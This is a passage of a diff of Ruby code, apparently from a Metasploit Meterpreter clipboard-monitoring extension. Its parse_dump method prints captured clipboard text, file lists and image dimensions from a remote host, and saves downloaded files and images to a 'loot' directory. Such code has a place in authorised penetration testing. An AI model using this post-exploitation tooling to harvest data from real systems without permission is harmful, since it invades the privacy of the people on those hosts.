388
|
+
end
|
|
389
|
+
end
|
|
390
|
+
|
|
391
|
+
def parse_dump(dump, get_images, get_files, download_path)
|
|
392
|
+
loot_dir = download_path || "."
|
|
393
|
+
if (get_images || get_files) && !::File.directory?( loot_dir )
|
|
394
|
+
::FileUtils.mkdir_p( loot_dir )
|
|
395
|
+
end
|
|
396
|
+
|
|
397
|
+
dump.each do |ts, elements|
|
|
398
|
+
elements.each do |type, v|
|
|
399
|
+
title = "#{type} captured at #{ts}"
|
|
400
|
+
under = "=" * title.length
|
|
401
|
+
print_line(title)
|
|
402
|
+
print_line(under)
|
|
403
|
+
|
|
404
|
+
case type
|
|
405
|
+
when 'Text'
|
|
406
|
+
print_line(v)
|
|
407
|
+
|
|
408
|
+
when 'Files'
|
|
409
|
+
total = 0
|
|
410
|
+
v.each do |f|
|
|
411
|
+
print_line("Remote Path : #{f[:name]}")
|
|
412
|
+
print_line("File size : #{f[:size]} bytes")
|
|
413
|
+
if get_files
|
|
414
|
+
download_file( loot_dir, f[:name] )
|
|
415
|
+
end
|
|
416
|
+
print_line
|
|
417
|
+
total += f[:size]
|
|
418
|
+
end
|
|
419
|
+
|
|
420
|
+
when 'Image'
|
|
421
|
+
print_line("Dimensions : #{v[:width]} x #{v[:height]}")
|
|
422
|
+
if get_images and !v[:data].nil?
|
|
423
|
+
file = "#{ts.gsub(/\D+/, '')}-#{Rex::Text.rand_text_alpha(8)}.jpg"
|
|
424
|
+
path = File.join(loot_dir, file)
|
|
425
|
+
path = ::File.expand_path(path)
|
|
426
|
+
::File.open(path, 'wb') do |x|
|
|
427
|
+
x.write v[:data]
|
|
428
|
+
end
|
|
429
|
+
print_line("Downloaded : #{path}")
|
|
430
|
+
end
|
|
431
|
+
end
|
|
432
|
+
print_line(under)
|
|
433
|
+
print_line
|
|
434
|
+
end
|
|
435
|
+
end
|
|
436
|
+
end
|
|
437
|
+
|
|
438
|
+
end
|
|
439
|
+
|
|
440
|
+
end
|
|
441
|
+
end
|
|
442
|
+
end
|
|
443
|
+
end
|
|
444
|
+
|